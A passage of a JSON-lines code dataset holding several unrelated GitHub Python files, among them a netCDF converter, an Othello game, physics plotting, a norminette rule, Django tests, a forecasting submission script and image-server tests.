['HRDPS_Historical','forecast_CRHO_spinup','GDPS_Current','HRDPS_Current_Snowpack']\n\n# Unit conversion done\n# Model p from mm to m\n# swe from kg/m^2 to m\n\n# Load in config file\n####### load user configurable paramters here #######\n# Check user defined configuraiton file\n\nif len(sys.argv) != 3:\n raise ValueError('Requires two arguments [configuration file] [chm_run_dir]')\n\n# Get name of configuration file/module\nconfigfile = sys.argv[1]\nchm_run_dir = sys.argv[2]\nprint(chm_run_dir)\n\n# Load in configuration file as module\nX = imp.load_source('',configfile)\n\n# Assign to local variables\ngit_dir = X.git_dir\n\nfor c_exp in [chm_run_dir]:\n print(c_exp)\n # 1km\n# # main_dir = os.path.normpath(r'C:\\\\Users\\new356\\Model_Output\\CHM\\Nov_2014')\n# main_dir = os.path.normpath(r'C:\\Users\\new356\\Model_Output\\CHM\\SnowCast')\n\n mod_dir = os.path.join(git_dir,'CHM_Configs',c_exp,'points')\n nc_file_out = 'CHM_pts.nc'\n # Move to Model dir\n os.chdir(mod_dir) \n # Get files\n cfiles = glob.glob('*_out.txt')\n # Time zone\n UTC_to_MST = 0 # UTC \n\n\n\n # Loop each station\n CHM_pts = []\n for cf in cfiles:\n cSta = cf.split('_')[0]\n print(\"processing \" + cSta)\n\n # Import MODEL data to pandas dataframe\n modData = pd.read_csv(cf,sep=\",\",parse_dates=True) \n modData.set_index('datetime',inplace=True)\n # Make datetime the index\n modData.index = pd.to_datetime(modData.index)\n modData.index = modData.index + datetime.timedelta(hours=UTC_to_MST)\n # Convert to data set and add station name\n c_ds = xr.Dataset(modData)\n c_ds['station'] = cSta\n c_ds.rename({'datetime':'time'}, inplace=True)\n # Save in list\n CHM_pts.append(c_ds)\n\n\n\n # concat all stations\n ds = xr.concat(CHM_pts,dim='station')\n \n # Convert unit of precipitaiotn from mm to m\n ds['p'] = ds.p / 1000\n ds['p_rain'] = ds.p_rain / 1000\n ds['p_snow'] = ds.p_snow / 1000\n\n # Convert unit of swe from kg/m^2 to m\n if 'swe' in ds.data_vars:\n ds['swe'] = ds.swe / 1000\n \n # Set -9999 (CHM missing value) to nan\n ds = ds.where(ds!=-9999)\n \n # Save out to netcdf\n ds.to_netcdf(nc_file_out,engine='netcdf4')\n \n print(ds)\n","repo_name":"NicWayand/SnowCast","sub_path":"Post_Processing/Point_Evals/CHM_point_output_to_netcdf.py","file_name":"CHM_point_output_to_netcdf.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74217587367","text":"import sys, string, random\n\ndef showboard(string):\n string = (\" \".join(string)+\" \")\n print(\" ------------------\")\n for i in range(0,len(string),16):\n print(str(int((i/16)))+str(\"|\")+\"\"+string[i:i+16]+\"|\"+str(int((i/16))))\n print(\" ------------------\")\n print(\" 0 1 2 3 4 5 6 7\")\n\n\ndef getequivalency():\n pos={}\n for i in range(8):\n pos[i] = {}\n for x in range(8):\n pos[i][x]=(i*8)+x\n flipd = {}\n flipo = {}\n RR = {}\n R2 = {}\n RL = {}\n flipx = {}\n flipy={}\n for i in range(8):\n flipo[i] ={}\n flipd[i] = {}\n RR[i] = {}\n R2[i] = {}\n RL[i] = {}\n flipx[i] = {}\n flipy[i]= {}\n for x in range(8):\n flipd[i][x]=pos[7-x][7-i]\n flipo[i][x] = pos[x][i]\n RR[i][x] = pos[x][7-i]\n R2[i][x] = pos[7-i][7-x]\n RL[i][x]=pos[7-x][7-(7-i)]\n flipx[i][x] = pos[i][7-x]\n flipy[i][x] = pos[7-i][x]\n return {\"RL\":RR,\"R2\":R2,\"RR\":RL,\"FD\":flipd,\"FO\":flipo, \"FY\":flipx,\"FX\":flipy, \"I\":pos}\n\ndef getneighbors():\n neighbors = {}\n for pos in range(64):\n neighbors[pos] = set([])\n neighbors[pos].add(pos+1)\n neighbors[pos].add(pos-1)\n neighbors[pos].add(pos-8)\n neighbors[pos].add(pos+8)\n neighbors[pos].add(pos+9)\n neighbors[pos].add(pos+7)\n neighbors[pos].add(pos-9)\n neighbors[pos].add(pos-7)\n neighbors[pos]=neighbors[pos]-set(range(64,100))-set(range(-10,0))\n if pos%8==7:\n neighbors[pos] = neighbors[pos]-set(range(0,64,8))\n elif pos%8==0:\n neighbors[pos] = neighbors[pos]-set(range(7,64,8))\n return neighbors\n\ndef posmoves(string, char):\n dictposmoves = set([])\n poschar = set([])\n for i, j in enumerate(string):\n if j == char:\n poschar.add(i)\n posneighbors = getneighbors()\n Tempposstep = {}\n #print(str(poschar))\n #print(string)\n for pos in poschar:\n for mov in posneighbors[pos]:\n if not string[mov] ==\".\" and not string[mov]==char:\n if (mov-pos)in Tempposstep:\n Tempposstep[mov-pos].add(mov)\n else:\n Tempposstep[mov-pos] = set([mov])\n #print(str(Tempposstep))\n for diff in Tempposstep.keys():\n for pos in Tempposstep[diff]:\n Temppos = pos\n while not string[Temppos]==char and not string[Temppos]==\".\":\n if Temppos+diff in posneighbors[Temppos]:\n Temppos+=diff\n else:\n break\n if string[Temppos] =='.':\n dictposmoves.add(Temppos)\n print(str(dictposmoves))\n return dictposmoves\n\ndef playmove(string, char, pos, neighhors):\n posdirections ={}\n flip = set([pos])\n Temp = set([])\n for mov in neighhors[pos]:\n if not string[mov]==char and not string[mov]==\".\":\n posdirections[mov-pos] = mov\n #print(mov)\n for diff in posdirections.keys():\n mov = posdirections[diff]\n while -1<mov<64 and not string[mov]==char and not string[mov]==\".\" :\n Temp.add(mov)\n mov = mov+diff\n if -1<mov<64 and string[mov]==char:\n flip = flip|Temp\n else:\n Temp = set([])\n for mov in flip:\n string=string[0:mov]+char+string[mov+1:len(string)]\n return string\n\ndef endgame(string):\n players = [\"O\",\"X\"]\n counts = [set([]),set([])]\n for player in range(2):\n for i, j in enumerate(string):\n if j == players[player]:\n counts[player].add(i)\n\n if len(counts[0])==len(counts[1]):\n print(\"Tie \"+str(len(counts[0]))+\"-\"+str(len(counts[1])))\n else:\n if len(counts[0])>len(counts[1]):\n winner = 0\n else:\n winner = 1\n print(players[winner]+\" wins \"+str(len(counts[winner]))+\"-\"+str(len(counts[1-winner])))\n\ndef transform(string, operation):\n Temp = \"\"\n for i in range(8):\n for x in range(8):\n Temp+=string[operation[i][x]]\n return Temp\n\ndef playgame(string, play):\n neighhors = getneighbors()\n print(str(neighhors))\n currentgame = string\n players = [\"O\",\"X\"]\n currplayer = 1\n check = True\n equivalnce = getequivalency()\n while \".\" in string:\n showboard(string)\n posmov = posmoves(string, players[currplayer])\n #print(str(posmov))\n if len(posmov)>0:\n check = True\n print(players[currplayer]+\"'s turn\\tRow Col\")\n if play[1-currplayer]==\"p\":\n Temp = input()\n if Temp.upper() in equivalnce:\n newstr = string\n if Temp.upper == \"I\":\n newstr = transform(string,equivalnce[Temp.upper()])\n showboard(newstr)\n Temp = input()\n else:\n while not Temp.upper()==\"I\":\n #print(equivalnce[Temp.upper()])\n newstr = transform(string,equivalnce[Temp.upper()])\n showboard(newstr)\n Temp = input()\n else:\n Temp = Temp.split()\n pos = -1\n if len(Temp)==1 and len(Temp[0])==1 and int(Temp[0])<8:\n pos = int(Temp[0])\n #print(str(pos))\n elif \",\" in Temp[0]:\n row = int(Temp[0][0])\n if len(Temp)>1:\n col = int(Temp[1])\n else:\n col = int(Temp[0][2])\n elif int(Temp[0])>7:\n print(str(pos))\n pos = int(Temp[0])\n\n else:\n row = int(Temp[0])\n col = int(Temp[1])\n if pos==-1:\n pos = (row*8)+col\n #print(str(pos\n #print(str(pos))\n #print(str(posmov))\n if pos in posmov:\n print(posmov)\n string = playmove(string, players[currplayer], pos, neighhors)\n currplayer = 1-currplayer\n else:\n print(\"Not a valid move\")\n else:\n pos = random.choice(list(posmov))\n print(str(pos))\n string = playmove(string, players[currplayer],pos, neighhors)\n currplayer = 1-currplayer\n\n else:\n if check:\n print(\"No Possible moves for \"+players[currplayer]+\" They Pass\")\n check = False\n currplayer = 1-currplayer\n else:\n print()\n endgame(string)\n return\n #print(string)\n showboard(string)\n endgame(string)\n\nif len(sys.argv)>2:\n play = [sys.argv[1],sys.argv[2]]\nelse:\n play = [\"p\",\"p\"]\nprint(str(play))\nplaygame(\"...........................OX......XO...........................\", play)\n","repo_name":"2017vtandale/Othello","sub_path":"Othellopt4.py","file_name":"Othellopt4.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19702306411","text":"#!/usr/bin/env python3\n\"\"\"\nPlotting routine for the fit inputs.\n\"\"\"\n\nimport argparse\nimport sys, os\nimport yaml\nfrom collections import Counter\nfrom scharm.limits.limitsty import alpha_names, reg_names\n\n_txt_size = 16\n_summed_bg = ['Wjets', 'Zjets', 'top', 'singleTop', 'other']\n_def_regions = ['cr_z', 'signal_mct150', 'cr_t', 'cr_w']\n_def_syst = ['jer','jes','met','metres', 'b', 'c', 'u', 't']\n_sys_lists = {\n 'default': _def_syst,\n 'jesbd': [\n 'jcb', 'jicalm', 'jicals', 'jpumu',\n 'jpunpv', 'jpupt', 'jpurho', 'jsp'], #, 'jnc'\n 'jesnp': ['jenp1', 'jenp2', 'jenp3', 'jenp4', 'jenp5', 'jenp6'],\n 'jesflav': ['jbjes', 'jflavcomp', 'jflavresp'],\n }\n\ndef _get_args():\n \"\"\"input parser\"\"\"\n d = 'default: %(default)s'\n syst_help = d + ' allowed expansions: {}'.format(\n ', '.join(_sys_lists.keys()))\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('fit_inputs')\n parser.add_argument('-r','--regions', nargs='+', default=_def_regions)\n parser.add_argument(\n '-s','--systematics', nargs='+', default=_def_syst, help=syst_help)\n parser.add_argument('-o','--plot-name', default='test.pdf', help=d)\n return parser.parse_args()\n\ndef run():\n \"\"\"top level routine\"\"\"\n args = _get_args()\n with open(args.fit_inputs) as yml:\n inputs_dict = yaml.load(yml)\n\n # allow adding of systematic groups from _sys_lists\n plot_systs = []\n for syst in args.systematics:\n if syst in _sys_lists:\n plot_systs += _sys_lists[syst]\n else:\n plot_systs.append(syst)\n\n systs = {}\n for syst in plot_systs:\n regs, nom, down, up, data = _get_counts(\n inputs_dict, args.regions, syst)\n systs[syst] = (regs, nom, down, up, data)\n\n ofile = args.plot_name\n odir = os.path.dirname(ofile)\n if odir and not os.path.isdir(odir):\n os.mkdir(odir)\n _plot_counts(systs, ofile)\n\n_syst_colors = list('rgbcmk') + ['orange', 'purple', 'brown', 'white']\ndef _plot_counts(counts, out_file):\n from matplotlib.figure import Figure\n from matplotlib.backends.backend_agg import FigureCanvasAgg as FigCanvas\n from numpy import arange\n\n fig = Figure(figsize=(8, 3))\n canvas = FigCanvas(fig)\n ax = fig.add_subplot(1,1,1)\n\n trash, ex_sys = next(iter(counts.items()))\n ex_regs, ex_nom, *nada, ex_data = ex_sys\n\n # offsetter for systematics\n sysw = 0.5\n syst_increment = sysw / (len(counts) - 1)\n syst_initial = -sysw / 2\n sys_num = {x:n for n, x in enumerate(sorted(counts.keys()))}\n def get_offset(syst):\n return syst_initial + sys_num[syst] * syst_increment\n\n x_vals_base = arange(len(ex_regs)) + 0.5\n ax.errorbar(\n x_vals_base, ex_data / ex_nom, yerr=ex_data**0.5/ ex_nom,\n fmt='o', color='k', label='data')\n\n ax.set_xticks(x_vals_base)\n ax.set_xticklabels([reg_names.get(x,x) for x in ex_regs])\n for sysnm, (regions, nom, down, up, data) in sorted(counts.items()):\n x_vals = x_vals_base + get_offset(sysnm)\n color = _syst_colors[sys_num[sysnm]]\n ax.set_xlim(0, len(regions))\n up_vals = up / nom\n ax.plot(x_vals, up_vals , '^', color=color,\n label=alpha_names.get(sysnm, sysnm))\n dn_vals = down / nom\n ax.plot(x_vals, dn_vals, 'v', color=color)\n\n ax.tick_params(labelsize=_txt_size)\n leg = ax.legend(\n numpoints=1, ncol=5, borderaxespad=0.0, loc='upper left',\n handletextpad=0, columnspacing=1, framealpha=0.5, fontsize=10)\n\n ax.axhline(1, linestyle='--', color=(0,0,0,0.5))\n ylims = ax.get_ylim()\n # ax.set_ylim(ylims[0], (ylims[1] - ylims[0]) *0.2 + ylims[1])\n ax.set_ylim(0.8, 1.3)\n ax.set_ylabel('Variation / Nominal')\n fig.tight_layout(pad=0.3, h_pad=0.3, w_pad=0.3)\n canvas.print_figure(out_file, bboxinches='tight')\n\ndef _get_counts(inputs_dict, regions, syst):\n \"\"\"returns counts as a tuple of Counters, (nom, down, up, data)\"\"\"\n yields = inputs_dict['nominal_yields']\n systs = inputs_dict['yield_systematics']\n if syst in systs:\n return _get_sym_counts(inputs_dict, regions, syst)\n nup = syst + 'up'\n ndn = syst + 'down'\n if any(x not in systs for x in [nup, ndn]):\n raise ValueError(\"couldn't find up / down systematics for {}\".format(\n syst))\n\n reg_up_counter = Counter()\n reg_dn_counter = Counter()\n reg_nom_counter = Counter()\n data_counter = {}\n for region in regions:\n for bg in _summed_bg:\n def get_yld(dic, reg, bg):\n nom = yields[reg].get(bg,[0])[0]\n return dic[reg].get(bg, [nom])[0]\n try:\n reg_nom_counter[region] += get_yld(yields,region,bg)\n reg_up_counter[region] += get_yld(systs[nup],region,bg)\n reg_dn_counter[region] += get_yld(systs[ndn],region,bg)\n except KeyError as err:\n raise KeyError(\"can't find {} {}\".format(region, bg))\n data_counter[region] = yields[region].get('data',[float('NaN')])[0]\n\n return _arrays_from_counters(\n reg_nom_counter, reg_dn_counter, reg_up_counter, data_counter)\n\ndef _get_sym_counts(inputs_dict, regions, syst):\n import numpy as np\n yields = inputs_dict['nominal_yields']\n systs = inputs_dict['yield_systematics']\n nom_counter = Counter()\n alt_counter = Counter()\n data_counter = {}\n for region in regions:\n for bg in _summed_bg:\n def get_yld(dic, reg, bg):\n nom = yields[reg].get(bg,[0])[0]\n return dic[reg].get(bg, [nom])[0]\n nom_counter[region] += get_yld(yields,region,bg)\n alt_counter[region] += get_yld(systs[syst],region,bg)\n data_counter[region] = yields[region].get('data',[float('NaN')])[0]\n\n sreg = sorted(regions)\n n_reg = len(regions)\n nom_array = np.zeros(n_reg)\n alt_array = np.zeros(n_reg)\n data_array = np.zeros(n_reg)\n for idx, reg in enumerate(sreg):\n nom_array[idx] = nom_counter[reg]\n alt_array[idx] = alt_counter[reg]\n data_array[idx] = data_counter[reg]\n diff = np.abs(nom_array - alt_array)\n down = nom_array - 0.5*diff\n up = nom_array + 0.5*diff\n return sreg, nom_array, down, up, data_array\n\ndef _arrays_from_counters(*counters):\n \"\"\"\n Takes dicts, returns (region_list, nominal, down, up).\n Meant to handle the asym counts only.\n \"\"\"\n from numpy import zeros\n nom, down, up, data = counters\n regions = list(sorted(nom.keys()))\n n_reg = len(regions)\n dn_array = zeros(n_reg)\n up_array = zeros(n_reg)\n nom_array = zeros(n_reg)\n data_array = zeros(n_reg)\n for idx, reg in enumerate(regions):\n dn_array[idx] = down[reg]\n up_array[idx] = up[reg]\n nom_array[idx] = nom[reg]\n data_array[idx] = data[reg]\n return regions, nom_array, dn_array, up_array, data_array\n\nif __name__ == '__main__':\n run()\n","repo_name":"dguest/susy-analysis","sub_path":"scripts/susy-fit-draw-inputs.py","file_name":"susy-fit-draw-inputs.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24755234727","text":"from norminette.rules import Rule\nimport re\n\nclass CheckHeader(Rule):\n def __init__(self):\n super().__init__()\n self.depends_on = []\n\n def parse_header(self, context):\n if context.check_token(0, \"MULT_COMMENT\") is False:\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n context.header_parsed = True\n return\n context.header += context.peek_token(0).value + '\\n'\n\n def check_header(self, context):\n val = r\"\\/\\* \\*{74} \\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\*.{3}([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* By: ([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* Created: ([^ ]* [^ ]*) by ([^ ]*).*\\*\\/\\n\\/\\* Updated: ([^ ]* [^ ]*) by ([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* \\*{74} \\*\\/\\n\"\n correct_header = re.match(val, context.header)\n if correct_header is None:\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n #context.new_error(\"INVALID_HEADER\", context.peek_token(0))\n #else:\n # print (correct_header.group(1,2,3,4,5,6))\n\n def run(self, context):\n \"\"\"\n Header checking. Just a warning for now. Does not trigger moulinette error\n \"\"\"\n if context.header_parsed == True:\n return False, 0\n elif context.history[-1] == \"IsComment\" and context.header_parsed == False:\n self.parse_header(context)\n context.header_started = True\n elif context.history[-1] != \"IsComment\" and context.header_started == True:\n self.check_header(context)\n context.header_parsed = True\n elif context.header_started == False and context.header_parsed == False and context.history[-1] != \"IsComment\":\n #context.new_error(\"INVALID_HEADER\", context.peek_token(0))\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n context.header_parsed = True\n","repo_name":"danlee65071/miniRT","sub_path":"venv/lib/python3.8/site-packages/norminette/rules/check_header.py","file_name":"check_header.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29558961478","text":"from django.test import tag\nfrom functional_tests.base import FunctionalTest\nfrom projects.models import Project\nfrom robjects.models import Robject\nfrom samples.models import Sample\nfrom guardian.shortcuts import assign_perm\n\n\n@tag('slow')\nclass TestUserVisitsSampleDetails(FunctionalTest):\n\n def create_sample_data(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE SAMPLE FOR PROJECT.\n samp = Sample.objects.create(code='sample_1', robject=robj)\n return(usr, proj, robj, samp)\n\n def test_user_enter_wrong_slug_in_url(self):\n self.not_matching_url_slug_helper(self.SAMPLE_DETAILS_URL)\n\n def test_annonymous_user_visits_samples_details(self):\n # CREATE SAMPLE PROJECT BASIC INFORMATIONS.\n proj = Project.objects.create(name=\"project_1\")\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE SAMPLE FOR PROJECT.\n samp = Sample.objects.create(code='sample_1', robject=robj)\n # Annonymus user want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n current_url = self.browser.current_url\n # Annonymus user is redirected to login page.\n expected_url = self.live_server_url + \\\n f\"/accounts/login/?next=/projects/{proj.name}/samples/{samp.id}/\"\n self.assertEqual(current_url, expected_url)\n\n def test_user_without_project_permission_wants_to_vist_sample_detail_page(self):\n self.permission_view_testing_helper(self.SAMPLE_DETAILS_URL)\n\n def test_user_with_permission_seas_single_sample_detail_page_and_checks_static_elements(self):\n # CREATE SAMPLE DATA.\n usr, proj, robj, samp = self.create_sample_data()\n # ASSIGN PERMISSIONS FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n samp = Sample.objects.create(code='sample_1', robject=robj)\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n # User seas header which is sample code.\n header_content = self.browser.find_element_by_css_selector('h1')\n self.assertEqual(header_content.text, \"sample_1\")\n # User also seas return to samples table link.\n link = self.browser.find_element_by_css_selector(\"a.link_back\")\n self.assertEqual(link.text, \"Back to sample table\")\n link.click()\n self.assertEqual(self.browser.current_url,\n self.live_server_url + f\"/projects/{proj.name}/samples/\")\n\n def test_user_checks_sample_details_on_page(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # SET USER PERMISSION FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE AND DETAILS.\n samp = Sample.objects.create(code='sample_1',\n robject=robj,\n notes='Some Sample Notes',\n form='solid, 1px',\n source='SourceCode',\n status=7\n )\n\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n\n # User seas list of details.\n self.assertIn(\n \"robject_1\", self.browser.find_element_by_css_selector(\".name\").text)\n self.assertIn(\"Some Sample Notes\",\n self.browser.find_element_by_css_selector(\".notes\").text)\n self.assertIn(\"solid, 1px\",\n self.browser.find_element_by_css_selector(\".form\").text)\n self.assertIn(\"SourceCode\",\n self.browser.find_element_by_css_selector(\".source\").text)\n self.assertIn(\"Production\",\n self.browser.find_element_by_css_selector(\".status\").text)\n\n def test_user_creates_several_samples_for_projects_and_checks_one_sample_details(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # SET USER PERMISSION FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE AND DETAILS.\n Sample.objects.create(code='sample_1',\n robject=robj,\n notes='Some Sample Notes',\n form='solid 1px',\n source='SourceCode',\n status=7\n )\n\n # CREATE SECOND SAMPLE AND DETAILS.\n samp2 = Sample.objects.create(code='sample_2',\n robject=robj,\n notes='Some Other Sample Notes',\n form='2px solid #ccc',\n source='source .bashrc',\n status=8\n )\n\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp2.id}/\")\n # User seas list of details for second sample.\n self.assertIn(\n \"robject_1\", self.browser.find_element_by_css_selector(\".name\").text)\n self.assertIn(\"Some Other Sample Notes\",\n self.browser.find_element_by_css_selector(\".notes\").text)\n self.assertIn(\"2px solid #ccc\",\n self.browser.find_element_by_css_selector(\".form\").text)\n self.assertIn(\"source .bashrc\",\n self.browser.find_element_by_css_selector(\".source\").text)\n self.assertIn(\"Quality COntrol\",\n self.browser.find_element_by_css_selector(\".status\").text)\n","repo_name":"Mateusz-Kirmuc/biodb_TDD","sub_path":"biodb/functional_tests/test_sample_details.py","file_name":"test_sample_details.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30664567510","text":"import os\nfrom glob import glob\nfrom functools import cached_property\nimport json\nimport datetime\n\nimport luigi\nimport pandas as pd\nfrom tqdm import tqdm\nfrom gluonts.model.forecast import Forecast\nimport torch\nimport pytorch_lightning as pl\n\nfrom datah_challenge.task.training import BaseTraining, DeepARTraining, TemporalFusionTransformerTraining\nfrom datah_challenge.dataset import JsonGzDataset, SplitFeaturesIntoFields, SameSizeTransformedDataset\nfrom datah_challenge.task.data_preparation import PrepareGluonTimeSeriesDatasets\n\n\nclass GenerateSubmission(luigi.Task):\n task_path: str = luigi.Parameter()\n\n num_samples: int = luigi.IntParameter(default=100)\n seed: int = luigi.IntParameter(default=42)\n\n @cached_property\n def training(self) -> BaseTraining:\n with open(os.path.join(self.task_path, \"params.json\"), \"r\") as params_file:\n params = json.load(params_file)\n training_class = {\n DeepARTraining.__name__: DeepARTraining,\n TemporalFusionTransformerTraining.__name__: TemporalFusionTransformerTraining,\n }[os.path.split(os.path.split(self.task_path)[0])[1]]\n return training_class(**params)\n\n def requires(self):\n return PrepareGluonTimeSeriesDatasets(\n categorical_variables=self.training.categorical_variables,\n id_variables=self.training.id_variables,\n )\n\n def output(self):\n return luigi.LocalTarget(\n os.path.join(\n self.task_path,\n f\"submission_num-samples={self.num_samples}_seed={self.seed}.csv\",\n )\n )\n\n def run(self):\n pl.seed_everything(self.seed, workers=True)\n\n paths = glob(os.path.join(self.input().path, \"*.json.gz\"))\n\n dataset = JsonGzDataset(paths, freq=\"W\")\n\n if isinstance(self.training, TemporalFusionTransformerTraining):\n dataset = SameSizeTransformedDataset(\n dataset,\n transformation=SplitFeaturesIntoFields(\n self.training.categorical_variables,\n self.training.real_variables,\n ),\n )\n\n predictor = self.training.get_trained_predictor(torch.device(\"cuda\"))\n predictor.batch_size = 512\n\n rows = []\n for forecast in tqdm(predictor.predict(dataset, num_samples=self.num_samples), total=len(dataset)): # type: Forecast\n delta = datetime.timedelta(weeks=self.training.test_steps - 1)\n\n dates = pd.date_range(\n forecast.start_date, forecast.start_date+delta, freq=\"W\"\n )\n\n for date, pred in zip(dates, forecast.mean):\n rows.append({\n \"ID\": \"%s_%s\" % (date.strftime('%Y-%m-%d'), forecast.item_id.replace(\"_partition=\", \"\")),\n \"QTT\": float(pred)\n })\n\n df = pd.DataFrame(data=rows)\n\n sample_df = pd.read_csv(\"assets/submission_sample.csv\")\n df = df[df[\"ID\"].isin(sample_df[\"ID\"])]\n\n remaining_df = sample_df[~(sample_df[\"ID\"].isin(df[\"ID\"]))]\n remaining_df[\"QTT\"] = 1\n\n df = pd.concat([df, remaining_df])\n\n df.sort_values(by=\"ID\").to_csv(self.output().path, index=False)\n\n\n\n\n\n","repo_name":"fernandocamargoai/datah-challenge","sub_path":"datah_challenge/task/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21963708704","text":"from PIL import Image\nimport os\nimport urllib.request\nimport io\nfrom tests.utils.formats import (\n thumb_test,\n resized_test,\n mask_test,\n crop_test,\n crop_null_annot_test,\n histogram_perimage_test,\n)\nimport pytest\nimport subprocess\n\n\ndef get_image(path, filename, root):\n filepath = os.path.join(path, filename)\n # If image does not exist locally -> download image\n\n if not os.path.exists(\"/tmp/images\"):\n os.mkdir(\"/tmp/images\")\n\n if not os.path.exists(root):\n os.mkdir(root)\n\n if not os.path.exists(f\"/tmp/images/{filename}\"):\n try:\n url = f\"https://data.cytomine.coop/open/tests/Test%20special%20char%20%25(_!.tiff\"\n urllib.request.urlretrieve(url, f\"/tmp/images/{filename}\")\n except Exception as e:\n print(\"Could not download image\")\n print(e)\n print(os.path.exists(filepath))\n if not os.path.exists(filepath):\n # os.mkdir(path)\n image_path = f\"/tmp/images/{filename}\"\n pims_root = root\n importer_path = f\"/app/pims/importer/import_local_images.py\" # pims folder should be in root folder\n import_img = subprocess.run(\n [\"python3\", importer_path, \"--path\", image_path], stdout=subprocess.PIPE\n )\n\n subdirs = os.listdir(pims_root)\n for subdir in subdirs:\n if \"upload-\" in str(subdir):\n subsubdirs = os.listdir(os.path.join(root, subdir))\n for subsubdir in subsubdirs:\n if filename in str(subsubdir):\n upload_dir = os.path.join(root, str(subdir))\n break\n if os.path.exists(path):\n os.unlink(path)\n\n print(path, root)\n print(os.path.exists(upload_dir)) # existe\n print(os.path.exists(path)) # n'existe pas\n print(os.path.exists(root)) # existe\n os.symlink(upload_dir, path)\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_exists(image_path_excentric_filename, root):\n path, filename = image_path_excentric_filename\n get_image(path, filename, root)\n assert os.path.exists(os.path.join(path, filename)) == True\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_info(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n response = client.get(f\"/image/upload_test_excentric/{filename}/info\")\n assert response.status_code == 200\n assert \"tiff\" in response.json()[\"image\"][\"original_format\"].lower()\n\n assert response.json()[\"image\"][\"width\"] == 46000\n assert response.json()[\"image\"][\"height\"] == 32914\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_norm_tile(client, image_path_excentric_filename):\n path, filename = image_path_excentric_filename\n response = client.get(\n f\"/image/upload_test_excentric/{filename}/normalized-tile/zoom/1/ti/0\",\n headers={\"accept\": \"image/jpeg\"},\n )\n assert response.status_code == 200\n\n img_response = Image.open(io.BytesIO(response.content))\n width_resp, height_resp = img_response.size\n\n assert width_resp == 256\n assert height_resp == 256\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_thumb(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n thumb_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_resized(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n resized_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_mask(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n mask_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_crop(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n crop_test(client, filename, \"excentric\")\n\n@pytest.mark.skip(reason=\"Does not return the correct response code\")\ndef test_crop_null_annot(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n crop_null_annot_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_histogram_perimage(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n histogram_perimage_test(client, filename, \"excentric\")\n","repo_name":"Cytomine-ULiege/pims","sub_path":"tests/test_excentric_filename.py","file_name":"test_excentric_filename.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38984974337","text":"import calendar\nfrom datetime import datetime, timedelta\nfrom typing import List, Optional\nfrom utils.misc.logging import logger\nfrom models import User\nfrom models.task import Task\nfrom loader import 